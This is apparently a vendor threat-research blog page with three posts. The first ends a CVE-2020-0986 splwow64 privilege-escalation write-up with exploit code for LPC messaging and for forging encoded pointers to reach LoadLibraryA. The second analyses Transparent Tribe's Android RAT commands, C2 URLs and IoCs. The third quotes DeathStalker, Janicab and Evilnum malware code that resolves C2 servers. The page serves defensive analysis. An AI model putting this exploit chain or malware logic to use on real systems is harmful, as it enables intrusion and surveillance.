typedef struct _PORT_VIEW { UINT64 Length; HANDLE SectionHandle; UINT64 SectionOffset; UINT64 ViewSize; UCHAR* ViewBase; UCHAR* ViewRemoteBase; } PORT_VIEW, *PPORT_VIEW; PORT_VIEW ClientView; typedef struct _PORT_MESSAGE_HEADER { USHORT DataSize; USHORT MessageSize; USHORT MessageType; USHORT VirtualRangesOffset; CLIENT_ID ClientId; UINT64 MessageId; UINT64 SectionSize; } PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER; typedef struct _PROXY_MSG { PORT_MESSAGE_HEADER MessageHeader; UINT64 InputBufSize; UINT64 InputBuf; UINT64 OutputBufSize; UINT64 OutputBuf; UCHAR Padding[0x1F8]; } PROXY_MSG, *PPORT_MESSAGE; PROXY_MSG LpcReply; PROXY_MSG LpcRequest; int GetPortName(PUNICODE_STRING DestinationString) { void *tokenHandle; DWORD sessionId; ULONG length; int tokenInformation[16]; WCHAR dst[256]; memset(tokenInformation, 0, sizeof(tokenInformation)); ProcessIdToSessionId(GetCurrentProcessId(), &sessionId); memset(dst, 0, sizeof(dst)); if (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY, &tokenHandle) || ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation, sizeof(tokenInformation), &length)) { return 0; } wsprintfW( dst, L"\\RPC Control\\UmpdProxy_%x_%x_%x_%x", sessionId, tokenInformation[2], tokenInformation[3], 0x2000); RtlInitUnicodeString(DestinationString, dst); return 1; } HANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName) { HANDLE sectionHandle = 0; HANDLE portHandle = 0; union _LARGE_INTEGER maximumSize; maximumSize.QuadPart = 0x20000; NtCreateSection(&sectionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0, &maximumSize, PAGE_READWRITE, SEC_COMMIT, NULL); if (sectionHandle) { ClientView.SectionHandle = sectionHandle; ClientView.Length = 0x30; ClientView.ViewSize = 0x9000; ZwSecureConnectPort(&portHandle, PortName, NULL, &ClientView, NULL, NULL, NULL, NULL, NULL); } return portHandle; } int main() { printf("Spawn splwow64.exe\n"); CHAR Path[0x100]; GetCurrentDirectoryA(sizeof(Path), Path); PathAppendA(Path, "CreateDC.exe"); // x86 application with call to CreateDC WinExec(Path, 0); Sleep(1000); CreateDCW(L"Microsoft XPS Document Writer", L"Microsoft XPS Document Writer", NULL, NULL); printf("Get port name\n"); UNICODE_STRING portName; if (!GetPortName(&portName)) { printf("Failed to get port name\n"); return 0; } printf("Create port\n"); HANDLE portHandle = CreatePortSharedBuffer(&portName); if (!(portHandle && ClientView.ViewBase && ClientView.ViewRemoteBase)) { printf("Failed to create port\n"); return 0; } }

To send data to the LPC server it’s enough to prepare the printer command in the shared memory region and send an LPC message with NtRequestWaitReplyPort().

memset(&LpcRequest, 0, sizeof(LpcRequest)); LpcRequest.MessageHeader.DataSize = 0x20; LpcRequest.MessageHeader.MessageSize = 0x48; LpcRequest.InputBufSize = 0x88; LpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command LpcRequest.OutputBufSize = 0x10; LpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize; // TODO: Prepare printer command NtRequestWaitReplyPort(portHandle, &LpcRequest, &LpcReply);

When the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *). This function takes LpcRequest as a parameter and verifies it. After that it allocates a buffer for the printer command and copies it there from shared memory. The printer command function INDEX, which is used to identify different driver functions, is stored as a double word at offset 4 in the printer command structure. Almost a complete list of different function INDEX values can be found in the header file winddi.h. This header file includes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list of INDEX values does not end there. Analysis of gdi32full.dll reveals that that are a number of special INDEX values and some of them are provided in the table below (to find them in binary, look for calls to PROXYPORT::SendRequest).

106 – INDEX_LoadDriver 107 - INDEX_UnloadDriver 109 – INDEX_DocumentEvent 110 – INDEX_StartDocPrinterW 111 – INDEX_StartPagePrinter 112 – INDEX_EndPagePrinter 113 – INDEX_EndDocPrinter 114 – INDEX_AbortPrinter 115 – INDEX_ResetPrinterW 116 – INDEX_QueryColorProfile

Function TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and if it passes the checks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.

if ( IsKernelMsg || INDEX >= 106 && (INDEX <= 107 || INDEX - 109 <= 7)) { // … GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize); }

GdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and the handler for one of them – namely INDEX_DocumentEvent – contains vulnerability CVE-2020-0986. The handler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable from the LPC client) to check that the command is intended for a printer with a valid handle. After the check it will use the function DecodePointer to decode the pointer of the function stored at the fpDocumentEvent global variable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call to memcpy() where source, destination and size arguments are obtained from the printer command and are fully controllable by the attacker.

Exploitation

In Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of this vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the fpDocumentEvent pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv. After that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent commands to leak the value of the fpDocumentEvent pointer. The value of the raw pointer is protected using EncodePointer protection, but the function pointed to by this raw pointer is executed each time the INDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes the fpDocumentEvent pointer the best candidate for an overwrite. A necessary step for exploitation is to encode our own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have the value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function from winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to encode our own pointer. The necessary calculations are provided below.

// Calculate secret for pointer encoding while (1) { secret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i & 0x3F); if ((secret & 0x3F) == i && __ROR8__((UINT64)DocumentEvent ^ secret, secret & 0x3F) == *(UINT64*)leaked_fpDocumentEvent) break; if (++i > 0x3F) { secret = 0; break; } } // Encode LoadLibraryA pointer with calculated secret UINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret & 0x3F);

At this stage, in order to achieve code execution from the splwow64.exe process, it’s sufficient to overwrite the fpDocumentEvent pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to load in the next LPC request with the INDEX_DocumentEvent command.

Overview of attack

CVE-2019-0880

Analysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available here. It’s another vulnerability that was exploited as an in-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same GdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to believe that the developers didn’t notice the existence of a variant for this vulnerability, so why was CVE-2020-0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but GdiPrinterThunk is totally broken. Even fixing a couple of calls to memcpy doesn’t really help.

Arbitrary pointer dereference host for applications

The problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential arbitrary pointer dereference vulnerability. Let’s take a look again at the format of the LPC request message.

typedef struct _PROXY_MSG { PORT_MESSAGE_HEADER MessageHeader; UINT64 InputBufSize; UINT64 InputBuf; UINT64 OutputBufSize; UINT64 OutputBuf; UCHAR Padding[0x1F8]; } PROXY_MSG, *PPORT_MESSAGE;

InputBuf and OutputBuf are both pointers that should point to a shared memory region. InputBuf points to a location where the printer command is prepared, and when this command is processed by GdiPrinterThunk the result might be written back to the LPC client using the pointer that was provided as OutputBuf. Many handlers for different INDEX values provide data to the LPC client, but the problem is that the pointers InputBuf and OutputBuf are fully controllable from the LPC client and manipulation of the OutputBuf pointer can lead to an overwrite of splwow64.exe’s process memory.

How it was mitigated

Microsoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of OutputBuf vulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data provided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the patch the format of the printer command was changed so it no longer contains the address of the handle table, but instead contains a valid driver ID (quad word at offset 0x18). Now the linked list of handle tables is stored inside the splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a handle table securely. For a printer command to be processed it should contain a valid printer handle (quad word at offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer driver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on this implementation seems to be unlikely. So, it’s safe to assume that this bug class was properly mitigated. However, there are still a couple of places in the code where it is possible to write a 0 for the address provided as OutputBuf without a handle check, but exploitation in such a scenario doesn’t appear to be feasible.

2020. augusztus 26.

Transparent Tribe: Evolution analysis,part 2

Background + Key findings

Transparent Tribe, also known as PROJECTM or MYTHIC LEOPARD, is a highly prolific group whose activities can be traced as far back as 2013. In the last four years, this APT group has never taken time off. They continue to hit their targets, which typically are Indian military and government personnel.

This is the second of two articles written to share the results of our recent investigations into Transparent Tribe. In the previous article, we described the various Crimson RAT components and provided an overview of impacted users. Here are some of the key insights that will be described in this part:

  • We found a new Android implant used by Transparent Tribe for spying on mobile devices. It was distributed in India disguised as a porn-related app and a fake national COVID-19 tracking app.
  • New evidence confirms a link between ObliqueRAT and Transparent Tribe.
Android implant

During our analysis, we found an interesting sample, which follows a variant of the previously described attack scheme. Specifically, the attack starts with a simple document, which is not malicious by itself, does not contain any macro and does not try to download other malicious components, but it uses social engineering tricks to lure the victim into downloading other documents from the following external URLs:

hxxp://sharingmymedia[.]com/files/Criteria-of-Army-Officers.doc

hxxp://sharingmymedia[.]com/files/7All-Selected-list.xls

15DA10765B7BECFCCA3325A91D90DB37 – Special Benefits.docx

The remote files are two Microsoft Office documents with an embedded malicious VBA, which behaves similarly to those described in the previous article and drops the Crimson “Thin Client”. The domain sharingmymedia[.]com was even more interesting: it was resolved with the IP 89.45.67[.]160 and was registered on 2020-01-10 using Namesilo and the following information:

Registrant Name: bluff hunnter
Registrant Organization:
Registrant Street: India Dehli
Registrant City: Dehli
Registrant State/Province: Delhi
Registrant Postal Code: 110001
Registrant Country: IN
Registrant Phone: +91.4214521212
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: hunterbluff007@gmail.com

The same information was used to register another domain, sharemydrives[.]com, which was registered seven days before, on 2020-01-03, using Namesilo. DNS resolution points to the same IP address: 89.45.67[.]160.

Using our Kaspersky Threat Intelligence Portal, we found the following related URL:


Information in Kaspersky Threat Intelligence Portal

The file is a modified version of MxVideoPlayer, a simple open-source video player for Android, downloadable from GitHub and used by Transparent Tribe to drop and execute their Android RAT.

Desi-porn.apk screenshot

The dropper tries to find a list of legitimate packages on the system:

  • imo.android.imoim
  • snapchat.android
  • viber.voip
  • facebook.lite

If the device was produced by Xiaomi, it also checks if the com.truecaller package is present.

The code used to check if legitimate packages are installed

The first application on the list that is not installed on the system will be selected as the target application. The malware embeds multiple APK files, which are stored in a directory named “assets”. The analyzed sample includes the following packages:

  • apk a20fc273a49c3b882845ac8d6cc5beac
  • apk 53cd72147b0ef6bf6e64d266bf3ccafe
  • apk bae69f2ce9f002a11238dcf29101c14f
  • apk b8006e986453a6f25fd94db6b7114ac2
  • apk 4556ccecbf24b2e3e07d3856f42c7072
  • apk 6c3308cd8a060327d841626a677a0549

The selected APK is copied to /.System/APK/. By default, the application tries to save the file to external storage, otherwise it saves it to the data directory.

Finally, the application tries to install the copied APK. The final malware is a modified version of the AhMyth Android RAT, open-source malware downloadable from GitHub, which is built by binding the malicious payload inside other legitimate applications.

The original AhMyth RAT includes support for the following commands:

Commands Additional fields Value Description x0000ca extra camlist get a camera list extra 1 get a photo from the camera with the id 1 extra 0 get a photo from the camera with the id 0 x0000fm extra

path ls

%dirpath% get a list of files in the directory specified in the “path” variable. extra

path dl

%filepath% upload the specified file to the C2 x0000sm extra ls get a list of text messages extra

to

sms sendSMS

%number%

%message% send a new text to another number x0000cl get the call log x0000cn get contacts x0000mc sec %seconds% record audio from the microphone for the specified number of seconds and upload the resulting file to the C2. x0000lm get the device location

 

Basically, it provides the following features:

  • camera manager (list devices and steal screenshots)
  • file manager (enumerate files and upload these to the C2)
  • SMS manager (get a list of text messages or send a text)
  • get the call log
  • get the contact list
  • microphone manager
  • location manager (track the device location)

The RAT that we analyzed is slightly different from the original. It includes new features added by the attackers to improve data exfiltration, whereas some of the core features, such as the ability to steal pictures from the camera, are missing.

The operators added the following commands:

  • x000upd – download a new APK from the URL specified in the “path” field.
  • x000adm – autodownloader: not implemented in the version we analyzed, but available in other samples.

Moreover, the creators of the RAT also improved its audio surveillance capabilities and included a command to delete text messages with specific contents.

Commands Additional fields Value Description x000upd path %url% download a new APK from the URL specified in the “path” field x000adm not implemented in the analyzed version. Other samples use this to start a class named “autodownloader”. x0000mc extra

sec au

%seconds% record audio for x seconds and upload the resulting file to the C2. Duration is specified in the “sec” value. extra mu stop recording and upload the resulting file to the C2 extra muS

  start recording continuously. This generates MP3 files stored in the “/.System/Records/” directory. x0000fm extra

path ls

%dirpath% get a list of files in the directory specified in the “path” variable extra

path dl

%filepath% upload the specified file to hxxp://212.8.240[.]221:80/server/upload.php sms extra ls get a list of text messages extra

to

sms sendSMS

%number%

%message% Send a new text to another number. extra

to

sms deleteSMS

 

%message% Delete a text that contains the string specified in the “sms” value. The “to” value is ignored. x0000cl get the call log x0000cn get contacts x0000lm get the device location

 

The “autodownloader” is a method used for performing the following actions:

  • upload a contact list
  • upload a text message list
  • upload files stored in the following directories:
    • /.System/Records/
    • /Download/
    • /DCIM/Camera/
    • /Documents/
    • /WhatsApp/Media/WhatsApp Images/
    • /WhatsApp/Media/WhatsApp Documents/

The attacker uses the method to collect contacts and text messages automatically. In addition, the method collects the following: audio files created with the “x0000mc” command and stored in /.System/Records/, downloaded files, photos, images and documents shared via WhatsApp and other documents stored on the device.

Another interesting difference between the original AhMyth and the one modified by Transparent Tribe is the technique used for getting the C2 address. The original version stores the C2 server as a string directly embedded in the code, whereas the modified version uses a different approach. It embeds another URL encoded with Base64 and used for getting a configuration file, which contains the real C2 address.

In our sample, the URL was as follows:

hxxp://tryanotherhorse[.]com/config.txt

It provided the following content:

212.8.240.221:5987

http://www.tryanotherhorse.com

The first value is the real C2, which seems to be a server hosted in the Netherlands.

The modified version communicates via a different URL scheme, which includes more information:

  • Original URL scheme: http://%server%:%port?model=%val%&manf=%val%&release=%val%&id=%val%
  • Modified URL scheme http://%server%:%port?mac=%val%&battery=%val%&model=%val%&manf=%val%&release=%val%&id=%val%
Covid-19 tracking app

We found evidence of Transparent Tribe taking advantage of pandemic-tracking applications to distribute trojanized code. Specifically, we found an APK file imitating Aarogya Setu, a COVID-19 tracking mobile application developed by the National Informatics Centre under the Ministry of Electronics and Information Technology, Government of India. It allows users to connect to essential health services in India.

The discovered application tries to connect to the same malicious URL to get the C2 IP address:
hxxp://tryanotherhorse[.]com/config.txt

It uses the same URL scheme described earlier and it embeds the following APK packages:

  • apk CF71BA878434605A3506203829C63B9D
  • apk 627AA2F8A8FC2787B783E64C8C57B0ED
  • apk 62FAD3AC69DB0E8E541EFA2F479618CE
  • apk A912E5967261656457FD076986BB327C
  • apk 3EB36A9853C9C68524DBE8C44734EC35
  • apk 931435CB8A5B2542F8E5F29FD369E010

Interestingly enough, at the end of April, the Indian Army issued a warning to its personnel against Pakistani agencies’ nefarious designs to hack the phones of Indian military personnel through a malicious application similar to Aarogya Setu.

According to some Indian online news sites, these applications were found to be sent by Pakistani Intelligence Operatives to WhatsApp groups of Indian Army personnel. It also mentioned that these applications later deployed additional packages:

According to some Indian online news sites, these applications were found to be sent by Pakistani Intelligence Operatives to WhatsApp groups of Indian Army personnel. It also mentioned that these applications later deployed additional packages:

  • face.apk
  • imo.apk
  • normal.apk
  • trueC.apk
  • snap.apk
  • viber.apk

Based on public information, the application may have been distributed by sending a malicious link via WhatsApp, SMS, phishing email or social media.

ObliqueRAT connection

ObliqueRAT is another malicious program, described by Cisco Talos in an interesting article published in February. It was attributed to Transparent Tribe because some samples were distributed through malicious documents forged with macros that resembled those used for distributing Crimson RAT.

The report described two ObliqueRAT variants, one distributed via a malicious document as the infection vector and another one, named “Variant #0” and distributed with a dropper.

4a25e48b8cf515f4cdd6711a69ccc875429dcc32007adb133fb25d63e53e2ac6

Unfortunately, as reported by Talos, “The initial distribution vector of this dropper is currently unknown”.

At this time, we do not have the full infection chain, but we can add another piece to the puzzle, because sharemydrives[.]com also hosted another file:

Information in Kaspersky Threat Intelligence Portal

The wifeexchange.exe sample is another dropper, which disguises itself as a porn clip.

Specifically, the executable file uses the same icon used by Windows for multimedia files.

Dropper icon

Once executed, the process tries to find a specific marker (“*#@”) inside its file image, then drops and opens the following files:

  • frame.exe – 4a25e48b8cf515f4cdd6711a69ccc875429dcc32007adb133fb25d63e53e2ac6
  • movie.mp4

Frame.exe is the dropper described by Talos, while movie.mp4 is a small porn clip.

Conclusions

Transparent Tribe members are trying to add new tools to extend their operations and infect mobile devices. They are also developing new custom .NET tools like ObliqueRAT, and as observed in the first report, we do not expect this group to slow down any time soon. We will keep monitoring their activities.

IoC

The followings IoC list is not complete. If you want more information about the APT discussed here, a full IoC list and YARA rules are available to customers of Kaspersky Threat Intelligence Reports. Contact: intelreports@kaspersky.com

15DA10765B7BECFCCA3325A91D90DB37 – Special Benefits.docx
48476DA4403243B342A166D8A6BE7A3F – 7All_Selected_list.xls
B3F8EEE133AE385D9C7655AAE033CA3E – Criteria of Army Officers.doc
D7D6889BFA96724F7B3F951BC06E8C02 – wifeexchange.exe

0294F46D0E8CB5377F97B49EA3593C25 – Android Dropper – Desi-porn.apk
5F563A38E3B98A7BC6C65555D0AD5CFD – Android Dropper – Aarogya Setu.apk
A20FC273A49C3B882845AC8D6CC5BEAC – Android RAT – face.apk
53CD72147B0EF6BF6E64D266BF3CCAFE – Android RAT – imo.apk
BAE69F2CE9F002A11238DCF29101C14F – Android RAT – normal.apk
B8006E986453A6F25FD94DB6B7114AC2 – Android RAT – snap.apk
4556CCECBF24B2E3E07D3856F42C7072 – Android RAT – trueC.apk
6C3308CD8A060327D841626A677A0549 – Android RAT – viber.apk
CF71BA878434605A3506203829C63B9D – Android RAT – face.apk
627AA2F8A8FC2787B783E64C8C57B0ED – Android RAT – imo.apk
62FAD3AC69DB0E8E541EFA2F479618CE – Android RAT – normal.apk
A912E5967261656457FD076986BB327C – Android RAT – snap.apk
3EB36A9853C9C68524DBE8C44734EC35 – Android RAT – trueC.apk
931435CB8A5B2542F8E5F29FD369E010 – Android RAT – viber.apk

hxxp://sharingmymedia[.]com/files/Criteria-of-Army-Officers.doc
hxxp://sharingmymedia[.]com/files/7All-Selected-list.xls
hxxp://sharemydrives[.]com/files/Laptop/wifeexchange.exe
hxxp://sharemydrives[.]com/files/Mobile/Desi-Porn.apk
hxxp://tryanotherhorse[.]com/config.txt – APK URL
212.8.240[.]221:5987 – Android RAT C2
hxxp://212.8.240[.]221:80/server/upload.php – URL used by Android RAT to upload files

 

2020. augusztus 24.

Lifting the veil on DeathStalker, a mercenary triumvirate

State-sponsored threat actors and sophisticated attacks are often in the spotlight. Indeed, their innovative techniques, advanced malware platforms and 0-day exploit chains capture our collective imagination. Yet these groups still aren’t likely to be a part of the risk model at most companies, nor should they be. Businesses today are faced with an array of much more immediate threats, from ransomware and customer information leaks, to competitors engaging in unethical business practices. In this blog post, we’ll be focusing on DeathStalker: a unique threat group that appears to target law firms and companies in the financial sector (although we’ve occasionally seen them in other verticals as well). As far as we can tell, this actor isn’t motivated by financial gain. They don’t deploy ransomware, steal payment information to resell it, or engage in any type of activity commonly associated with the cybercrime underworld. Their interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as some sort of information broker in financial circles.

DeathStalker first came to our attention through a PowerShell-based implant called Powersing. By unraveling this thread, we were able to identify activities dating back to 2018, and possibly even 2012. But before we dive into a history of DeathStalker and possible links to known groups, we’ll start with a bit of background, beginning with this actor’s current arsenal.

The Powersing toolchain Overview

Recent operations we attribute to this threat actor rely on the same intrusion vector: spear-phishing emails with attached archives containing a malicious LNK file.

Despite looking like documents from the Explorer or popular archive-extraction products, the shortcuts lead to cmd.exe. These shortcut files have the following structure:

Clicking them initiates a convoluted sequence resulting in the execution of arbitrary code on the victim’s machine. A short PowerShell script, passed through cmd.exe’s arguments, bootstraps the following chain:

  • Stage 0’s role is to extract and execute the next element of the chain, as well as a decoy document embedded inside the LNK file to display to the user. This creates the illusion of having clicked on a real document and ensures the victim doesn’t get suspicious.
  • Stage 1 is a PowerShell script containing C# assembly designed to connect to a dead drop resolver (more on this in the next paragraph) and obtain cryptographic material used to decode the last stage of the chain by extracting a “DLL” file from the shortcut and locating a Base64-encoded list of URLs at a fixed offset. This establishes persistence by creating a shortcut (using the dropped icon) in the Windows startup folder pointing to the VBE startup script.
  • Finally, on stage 2, the actual malware implant used to take control of the victim’s machine. It connects to one of the dead drop resolvers to get the address of the real C&C server and enters a loop that looks for orders every few seconds.
  • Upon system restart, the VBE startup script – which closely resembles stage 0 – is automatically executed, once again leading all the way to Powersing stage 2.

Communications with the C&C server involve the exchange of JSON-encoded objects. Powersing only has two tasks:

  • Capture periodic screenshots from the victim’s machine, which are immediately sent to the C&C server (two built-in commands allow operators to change screenshot quality and periodicity)
  • Execute arbitrary Powershell scripts provided by the C&C

On stages 1 and 2, security software evasion is carried out with a high degree of variation across the different samples we’ve analyzed. Depending on the AV detected on the machine, Powersing may opt for alternative persistence methods, or even stop running entirely. We suspect that the group behind this toolset performs detection tests before each of their campaigns and updates their scripts based on the results. This indicates an iterative and fast-paced approach to software design. It’s worth pointing out that stage 2 actively looks for traces of virtualization (for example, vendor specific MAC addresses) and malware analysis tools on the machine, and reports this information to the C&C server.

To wrap up this section, we’d like to mention that Powersing isn’t a monolithic malware platform. Instead, it’s a stealthy foothold inside the victim’s network with its key role to enable the projection of further tools.

Dead drop resolvers

The DeathStalkers toolchain leverages a number of public services as dead drop resolvers. These services provide a way for attackers to store data at a fixed URL through public posts, comments, user profiles, content descriptions, etc. Messages left by the attackers follow the following patterns: “My keyboard doesn’t work… [string].” and “Yo bro I sing [Base64 encoded string] yeah”.

During our investigation of this threat actor, we discovered such messages on:

  • Google+
  • Imgur
  • Reddit
  • ShockChan
  • Tumblr
  • Twitter
  • YouTube
  • WordPress

In all likelihood, this list isn’t exhaustive. A number of these messages can be discovered through simple Google queries. Powersing’s first order of business is to connect to any dead drop resolver it knows to retrieve this information. Stage 1 consumes the first string of these messages, which contains the AES key used to decode stage 2. Then stage 2 connects to the dead drop resolver to obtain the integer encoded in the second string. As the code excerpt below shows, this integer is divided by an arbitrary constant (which varies depending on the sample) before being converted to an IP address:

public string LongToIP(string long_ip_string) { long longIP; long.TryParse(long_ip_string, out longIP); longIP = longIP / 25835; // NB: divide integer by an arbitrary constant string ip = string.Empty; for (int i = 0; i < 4; i++) { int num = (int)(longIP / Math.Pow(256, (3 - i))); longIP = longIP - (long)(num * Math.Pow(256, (3 - i))); if (i == 0) ip = num.ToString(); else ip = ip + "." + num.ToString(); } return ip; }

This IP address is then stored on the user’s hard drive and used to establish a connection to the real C&C server used by the operators to control Powersing. Relying on well-known public services allows cybercriminals to blend initial backdoor communications into legitimate network traffic. It also limits what defenders can do to hinder their operations, as these platforms can’t generally be blocklisted at the company level, and getting content taken down from them can be a difficult and lengthy process. However, this comes at a price: the internet never forgets, and it’s also difficult for cybercriminals to remove traces of their operations. Thanks to the data indexed or archived by search engines, we estimate that Powersing was first used around August 2017.

A final detail we’d like to mention is that a number of Powersing C&Cs we discovered had SSL certificates reminiscent of Sofacy’s infamous Chopstick C&C “IT Department” certificates. We’re confident this infrastructure isn’t linked with Sofacy and believe this is an attempt by the threat actor to lead defenders to erroneous conclusions.

DeathStalker links to known groups Janicab

Sec0wn’s original blog post introducing Powersing hinted at possible links with a malware family called Janicab, whose older samples date back to 2012. However, to the best of our knowledge, this connection was never explored publicly. Ultimately, we obtained one of the malware samples listed by F-Secure in a 2015 blog post (1fe4c500c9f0f7630a6037e2de6580e9) on Janicab to look for similarities.

This file is another LNK pointing to cmd.exe that drops a VBE script on the system when clicked, as well as a decoy document. The script establishes a connection to an unlisted YouTube video to obtain C&C information embedded in the description:

The integer obtained on this page is then divided by a constant before being converted to an IP address:

Set objRE = New RegExp With objRE .Pattern = "our (.*)th psy anniversary" .IgnoreCase = True End With Set objMatch = objRE.Execute( outputHTML ) If objMatch.Count = 1 Then server = "" server = objMatch.Item(0).Submatches(0) server = server / 31337 'NB: divide integer by an arbitrary constant 'msgbox(server) server = IPConvert(server) server = "http://" & server & "/wp-admin-content" End If

While the use of YouTube as a dead drop resolver alone wouldn’t be sufficient to establish a link between the two groups, we feel that the process of obtaining an integer somewhere online and dividing it before interpreting it as an IP address is unique enough to draw a first connection.

Janicab’s features also remind us of Powersing’s: the sample contains VM detection based on the MAC address of the machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab also periodically sends screenshot captures of the victim’s desktop to the C&C and appears to enable the execution of arbitrary Python scripts.

More recent versions of Janicab (85ed6ab8f60087e80ab3ff87c15b1174) also involve network traffic reminiscent of Powersing, especially when the malware registers with its C&C server:

Powersing registration request (POST data) Janicab registration request {
“un”: “[username]”,
“cn”: “[computer name]”,
“av”: “[installed AV program]”,
“dob”: “[OS installation date]”,
“os”: “[OS version]”,
“ou”: “[campaign identifier]”,
“dc”: “[version]”
} GET /gid.php?action=add&cn=[computer name]&un=[username]&v=[version]&av=[installed AV program]&an=[campaign identifier]

In addition, this sample contains the exact same list of blacklisted VM MAC addresses as the Powersing sample introduced earlier in this post, in the same order.

Powersing’s blacklisted MAC addresses Janicab’s blacklisted MAC addresses virtual_mac_prefix.Add(“00015D”); macs(0) = “00-01-5D” virtual_mac_prefix.Add(“0003BA”); macs(1) = “00-03-BA” virtual_mac_prefix.Add(“000782”); macs(2) = “00-07-82” virtual_mac_prefix.Add(“000F4B”); macs(3) = “00-0F-4B” virtual_mac_prefix.Add(“00104F”); macs(4) = “00-10-4F” virtual_mac_prefix.Add(“0010E0”); macs(5) = “00-10-E0” virtual_mac_prefix.Add(“00144F”); macs(6) = “00-14-4F” virtual_mac_prefix.Add(“0020F2”); macs(7) = “00-20-F2” virtual_mac_prefix.Add(“002128”); macs(8) = “00-21-28” virtual_mac_prefix.Add(“0021F6”); macs(9) = “00-21-F6” virtual_mac_prefix.Add(“005056”); macs(10) = “00-50-56” virtual_mac_prefix.Add(“000C29”); macs(11) = “00-0C-29” virtual_mac_prefix.Add(“000569”); macs(12) = “00-05-69” virtual_mac_prefix.Add(“0003FF”); macs(13) = “00-03-FF” virtual_mac_prefix.Add(“001C42”); macs(14) = “00-1C-42” virtual_mac_prefix.Add(“00163E”); macs(15) = “00-16-3E” virtual_mac_prefix.Add(“080027”); macs(16) = “08-00-27” virtual_mac_prefix.Add(“001C14”); macs(17) = “00-1C-14” virtual_mac_prefix.Add(“080020”); macs(18) = “08-00-20” virtual_mac_prefix.Add(“000D3A”); macs(19) = “00-0D-3A” virtual_mac_prefix.Add(“00125A”); macs(20) = “00-12-5A” virtual_mac_prefix.Add(“00155D”); macs(21) = “00-15-5D” virtual_mac_prefix.Add(“0017FA”); macs(22) = “00-17-FA” virtual_mac_prefix.Add(“001DD8”); macs(23) = “00-1D-D8” virtual_mac_prefix.Add(“002248”); macs(24) = “00-22-48” virtual_mac_prefix.Add(“0025AE”); macs(25) = “00-25-AE” virtual_mac_prefix.Add(“0050C2”); macs(26) = “00-50-C2” virtual_mac_prefix.Add(“0050F2”); macs(27) = “00-50-F2” virtual_mac_prefix.Add(“444553”); macs(28) = “44-45-53” virtual_mac_prefix.Add(“7CED8D”); macs(29) = “7C-ED-8D” Evilnum

Another possible connection worth investigating concerns the more recent Evilnum malware family, which was the subject of an in-depth blog post from ESET last July, as well as a couple of our own private reports. ESET’s post details another LNK-based infection chain leading to the execution of Javascript-based malware. Again, we obtained an old Evilnum sample (219dedb53da6b1dce0d6c071af59b45c) and observed that it also obtained C&C information from a dead drop resolver (GitHub) to obtain an IP address converted with the following code:

function extract_srvaddr() { serverFound = false; pattern = 'our news start at (.*) thank you'; while(serverFound == false) { var item = items[Math.floor(Math.random()*items.length)]; var html = get_page_content_with_ie(item,''); if(html != '') { var match = extract_string(pattern, html); if(match != null) { srv = num2dot(match[1]/666); // NB: divide integer by a constant srv = srv + "/Validate"; srv_stat = get_page_content_with_ie(srv+"/ValSrv", ''); validate_str = extract_string('youwillnotfindthisanywhare', srv_stat); if(validate_str == 'youwillnotfindthisanywhare') { serverFound = true; return srv; } } } }

We can’t help but notice the pattern of looking for a specific string using a regular expression to obtain an integer, then dividing this integer by a constant resulting in the IP address of the C&C server. While Evilnum provides more capabilities than Powersing, it can also capture screenshots and send them to the C&C server.

In terms of victimology, Evilnum focuses on companies in the Fintech sector. It appears to be more interested in business intelligence than financial gain. This is consistent with the DeathStalker activity we’ve observed thus far.

One final connection we want to mention is that recent Evilnum (835d94b0490831da27d9bf4e9f4b429c) and Janicab samples have some slight code overlaps, despite being written in different languages:

  • Variables with similar names (“ieWatchdogFilename” for Janicab, “ieWatchdogPath” for Evilnum) used in functions performing equivalent tasks
  • Two functions used for cleanup have identical names: “deleteLeftOvers”

We feel that these names are unique enough to create an additional link between the two malware families. Less conclusively, this Evilnum sample also contains a function called “long2ip” to convert integers to IP addresses, while Powersing contains a similar implementation under the “LongToIP” name.

Summary

Powersing, Janicab and Evilnum are three scripting language-based toolchains exhibiting the following similarities:

  • All three are distributed through LNK files contained in archives delivered through spear-phishing
